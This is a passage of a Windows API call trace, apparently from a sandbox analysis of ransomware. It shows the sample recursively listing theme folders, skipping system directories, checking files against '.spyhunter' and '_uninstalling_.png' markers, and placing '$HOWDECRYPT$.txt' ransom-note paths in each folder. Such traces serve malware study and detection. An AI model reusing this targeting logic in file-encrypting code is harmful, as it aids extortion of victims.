lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.008] lstrlenW (lpString="System Volume Information") returned 25 [0091.008] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\..") returned 71 [0091.008] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.008] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.008] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.008] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0091.008] lstrlenW (lpString="Windows") returned 7 [0091.008] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0091.008] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.008] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0091.008] lstrlenW (lpString="System Volume Information") returned 25 [0091.009] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 80 [0091.009] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0091.009] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.009] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0091.009] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 80 [0091.009] GetProcessHeap () returned 0x2c0000 [0091.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x342590 [0091.009] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13c8) returned 0x3824f8 [0091.009] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.009] lstrcmpiW (lpString1="SUMIPNTG.ELM", lpString2="Windows") returned -1 [0091.009] lstrlenW (lpString="Windows") returned 7 [0091.009] lstrcmpiW (lpString1="SUMIPNTG.ELM", lpString2="$Recycle.bin") returned 1 [0091.009] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.009] lstrcmpiW (lpString1="SUMIPNTG.ELM", lpString2="System Volume Information") returned -1 [0091.009] lstrlenW (lpString="System Volume Information") returned 25 [0091.009] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM") returned 81 [0091.009] StrStrIW (lpFirst="SUMIPNTG.ELM", lpSrch=".spyhunter") returned 0x0 [0091.009] lstrcmpW (lpString1="SUMIPNTG.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.009] lstrcmpW (lpString1="SUMIPNTG.ELM", lpString2="_uninstalling_.png") returned 1 [0091.009] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM") returned 81 [0091.009] GetProcessHeap () returned 0x2c0000 [0091.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342680 [0091.009] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13d0) returned 0x3824f8 [0091.009] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.010] lstrcmpiW (lpString1="SUMIPNTG.INF", lpString2="Windows") returned -1 [0091.010] lstrlenW (lpString="Windows") returned 7 [0091.010] lstrcmpiW (lpString1="SUMIPNTG.INF", lpString2="$Recycle.bin") returned 1 [0091.010] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.010] lstrcmpiW (lpString1="SUMIPNTG.INF", lpString2="System Volume Information") returned -1 [0091.010] lstrlenW (lpString="System Volume Information") returned 25 [0091.010] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF") returned 81 [0091.010] StrStrIW (lpFirst="SUMIPNTG.INF", lpSrch=".spyhunter") returned 0x0 [0091.010] lstrcmpW (lpString1="SUMIPNTG.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.010] lstrcmpW (lpString1="SUMIPNTG.INF", lpString2="_uninstalling_.png") returned 1 [0091.010] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF") returned 81 [0091.010] GetProcessHeap () returned 0x2c0000 [0091.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342770 [0091.010] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13d8) returned 0x3824f8 [0091.010] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.010] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0091.010] lstrlenW (lpString="Windows") returned 7 [0091.010] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0091.010] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.010] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0091.010] lstrlenW (lpString="System Volume Information") returned 25 [0091.010] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 81 [0091.010] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0091.010] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.010] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0091.010] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 81 [0091.011] GetProcessHeap () returned 0x2c0000 [0091.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342860 [0091.011] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13e0) returned 0x3824f8 [0091.011] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.011] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.011] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\$HOWDECRYPT$.txt") returned 85 [0091.011] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\$HOWDECRYPT$.txt") returned 85 [0091.011] GetProcessHeap () returned 0x2c0000 [0091.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3552b8 [0091.011] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13e8) returned 0x3824f8 [0091.011] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.011] lstrcmpiW (lpString1="THEMES.INF", lpString2="Windows") returned -1 [0091.011] lstrlenW (lpString="Windows") returned 7 [0091.011] lstrcmpiW (lpString1="THEMES.INF", lpString2="$Recycle.bin") returned 1 [0091.011] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.011] lstrcmpiW (lpString1="THEMES.INF", lpString2="System Volume Information") returned 1 [0091.011] lstrlenW (lpString="System Volume Information") returned 25 [0091.011] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned 70 [0091.011] StrStrIW (lpFirst="THEMES.INF", lpSrch=".spyhunter") returned 0x0 [0091.011] lstrcmpW (lpString1="THEMES.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.011] lstrcmpW (lpString1="THEMES.INF", lpString2="_uninstalling_.png") returned 1 [0091.012] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned 70 [0091.012] GetProcessHeap () returned 0x2c0000 [0091.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e050 [0091.012] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13f0) returned 0x3824f8 [0091.012] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.012] lstrcmpiW (lpString1="WATER", lpString2="Windows") returned -1 [0091.012] lstrlenW (lpString="Windows") returned 7 [0091.012] lstrcmpiW (lpString1="WATER", lpString2="$Recycle.bin") returned 1 [0091.012] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.012] lstrcmpiW (lpString1="WATER", lpString2="System Volume Information") returned 1 [0091.012] lstrlenW (lpString="System Volume Information") returned 25 [0091.012] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER") returned 65 [0091.012] lstrcmpW (lpString1="WATER", lpString2=".") returned 1 [0091.012] lstrcmpW (lpString1="WATER", lpString2="..") returned 1 [0091.012] GetProcessHeap () returned 0x2c0000 [0091.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.012] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\*") returned 67 [0091.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.026] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.026] lstrlenW (lpString="Windows") returned 7 [0091.026] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.026] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.026] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.026] lstrlenW (lpString="System Volume Information") returned 25 [0091.026] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\.") returned 67 [0091.026] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.026] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.026] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.026] lstrlenW (lpString="Windows") returned 7 [0091.026] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.026] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.026] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.026] lstrlenW (lpString="System Volume Information") returned 25 [0091.026] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\..") returned 68 [0091.026] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.026] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.026] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.026] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0091.026] lstrlenW (lpString="Windows") returned 7 [0091.026] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0091.027] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.027] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0091.027] lstrlenW (lpString="System Volume Information") returned 25 [0091.027] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 77 [0091.027] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0091.027] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.027] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0091.027] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 77 [0091.027] GetProcessHeap () returned 0x2c0000 [0091.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x380448 [0091.027] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13f0) returned 0x3824f8 [0091.027] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.027] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0091.027] lstrlenW (lpString="Windows") returned 7 [0091.027] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0091.027] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.027] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0091.027] lstrlenW (lpString="System Volume Information") returned 25 [0091.027] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 78 [0091.027] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0091.027] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.027] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0091.027] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 78 [0091.027] GetProcessHeap () returned 0x2c0000 [0091.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377510 [0091.028] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13f8) returned 0x3824f8 [0091.028] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.028] lstrcmpiW (lpString1="WATER.ELM", lpString2="Windows") returned -1 [0091.028] lstrlenW (lpString="Windows") returned 7 [0091.028] lstrcmpiW (lpString1="WATER.ELM", lpString2="$Recycle.bin") returned 1 [0091.028] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.028] lstrcmpiW (lpString1="WATER.ELM", lpString2="System Volume Information") returned 1 [0091.028] lstrlenW (lpString="System Volume Information") returned 25 [0091.028] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM") returned 75 [0091.028] StrStrIW (lpFirst="WATER.ELM", lpSrch=".spyhunter") returned 0x0 [0091.028] lstrcmpW (lpString1="WATER.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.028] lstrcmpW (lpString1="WATER.ELM", lpString2="_uninstalling_.png") returned 1 [0091.028] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM") returned 75 [0091.028] GetProcessHeap () returned 0x2c0000 [0091.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3461e8 [0091.028] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1400) returned 0x3824f8 [0091.028] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.028] lstrcmpiW (lpString1="WATER.INF", lpString2="Windows") returned -1 [0091.028] lstrlenW (lpString="Windows") returned 7 [0091.028] lstrcmpiW (lpString1="WATER.INF", lpString2="$Recycle.bin") returned 1 [0091.028] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.028] lstrcmpiW (lpString1="WATER.INF", lpString2="System Volume Information") returned 1 [0091.028] lstrlenW (lpString="System Volume Information") returned 25 [0091.029] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF") returned 75 [0091.029] StrStrIW (lpFirst="WATER.INF", lpSrch=".spyhunter") returned 0x0 [0091.029] lstrcmpW (lpString1="WATER.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.029] lstrcmpW (lpString1="WATER.INF", lpString2="_uninstalling_.png") returned 1 [0091.029] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF") returned 75 [0091.029] GetProcessHeap () returned 0x2c0000 [0091.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3462c8 [0091.029] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1408) returned 0x3824f8 [0091.029] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.029] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.029] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\$HOWDECRYPT$.txt") returned 82 [0091.029] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\$HOWDECRYPT$.txt") returned 82 [0091.029] GetProcessHeap () returned 0x2c0000 [0091.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x342950 [0091.029] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1410) returned 0x3824f8 [0091.029] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.029] lstrcmpiW (lpString1="WATERMAR", lpString2="Windows") returned -1 [0091.029] lstrlenW (lpString="Windows") returned 7 [0091.029] lstrcmpiW (lpString1="WATERMAR", lpString2="$Recycle.bin") returned 1 [0091.029] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.030] lstrcmpiW (lpString1="WATERMAR", lpString2="System Volume Information") returned 1 [0091.030] lstrlenW (lpString="System Volume Information") returned 25 [0091.030] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR") returned 68 [0091.030] lstrcmpW (lpString1="WATERMAR", lpString2=".") returned 1 [0091.030] lstrcmpW (lpString1="WATERMAR", lpString2="..") returned 1 [0091.030] GetProcessHeap () returned 0x2c0000 [0091.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.030] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\*") returned 70 [0091.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.031] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.031] lstrlenW (lpString="Windows") returned 7 [0091.031] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.031] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.031] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.031] lstrlenW (lpString="System Volume Information") returned 25 [0091.031] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\.") returned 70 [0091.031] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.031] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.031] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.031] lstrlenW (lpString="Windows") returned 7 [0091.031] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.031] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.031] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.031] lstrlenW (lpString="System Volume Information") returned 25 [0091.031] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\..") returned 71 [0091.031] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.031] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.031] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.031] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0091.031] lstrlenW (lpString="Windows") returned 7 [0091.032] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0091.032] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.032] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0091.032] lstrlenW (lpString="System Volume Information") returned 25 [0091.032] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 80 [0091.032] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0091.032] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.032] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0091.032] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 80 [0091.032] GetProcessHeap () returned 0x2c0000 [0091.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x342a40 [0091.032] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1418) returned 0x3824f8 [0091.032] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.032] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0091.032] lstrlenW (lpString="Windows") returned 7 [0091.032] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0091.032] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.032] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0091.032] lstrlenW (lpString="System Volume Information") returned 25 [0091.032] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 81 [0091.032] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0091.032] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.032] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0091.032] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 81 [0091.033] GetProcessHeap () returned 0x2c0000 [0091.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342b30 [0091.033] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1420) returned 0x3824f8 [0091.033] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.033] lstrcmpiW (lpString1="WATERMAR.ELM", lpString2="Windows") returned -1 [0091.033] lstrlenW (lpString="Windows") returned 7 [0091.033] lstrcmpiW (lpString1="WATERMAR.ELM", lpString2="$Recycle.bin") returned 1 [0091.033] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.033] lstrcmpiW (lpString1="WATERMAR.ELM", lpString2="System Volume Information") returned 1 [0091.033] lstrlenW (lpString="System Volume Information") returned 25 [0091.033] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM") returned 81 [0091.037] StrStrIW (lpFirst="WATERMAR.ELM", lpSrch=".spyhunter") returned 0x0 [0091.037] lstrcmpW (lpString1="WATERMAR.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.037] lstrcmpW (lpString1="WATERMAR.ELM", lpString2="_uninstalling_.png") returned 1 [0091.037] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM") returned 81 [0091.038] GetProcessHeap () returned 0x2c0000 [0091.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342c20 [0091.039] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1420) returned 0x3824f8 [0091.039] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.039] lstrcmpiW (lpString1="WATERMAR.INF", lpString2="Windows") returned -1 [0091.039] lstrlenW (lpString="Windows") returned 7 [0091.039] lstrcmpiW (lpString1="WATERMAR.INF", lpString2="$Recycle.bin") returned 1 [0091.039] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.039] lstrcmpiW (lpString1="WATERMAR.INF", lpString2="System Volume Information") returned 1 [0091.039] lstrlenW (lpString="System Volume Information") returned 25 [0091.039] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF") returned 81 [0091.039] StrStrIW (lpFirst="WATERMAR.INF", lpSrch=".spyhunter") returned 0x0 [0091.039] lstrcmpW (lpString1="WATERMAR.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.039] lstrcmpW (lpString1="WATERMAR.INF", lpString2="_uninstalling_.png") returned 1 [0091.039] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF") returned 81 [0091.039] GetProcessHeap () returned 0x2c0000 [0091.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342d10 [0091.039] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1428) returned 0x3824f8 [0091.040] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.040] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.040] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\$HOWDECRYPT$.txt") returned 85 [0091.040] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\$HOWDECRYPT$.txt") returned 85 [0091.040] GetProcessHeap () returned 0x2c0000 [0091.040] 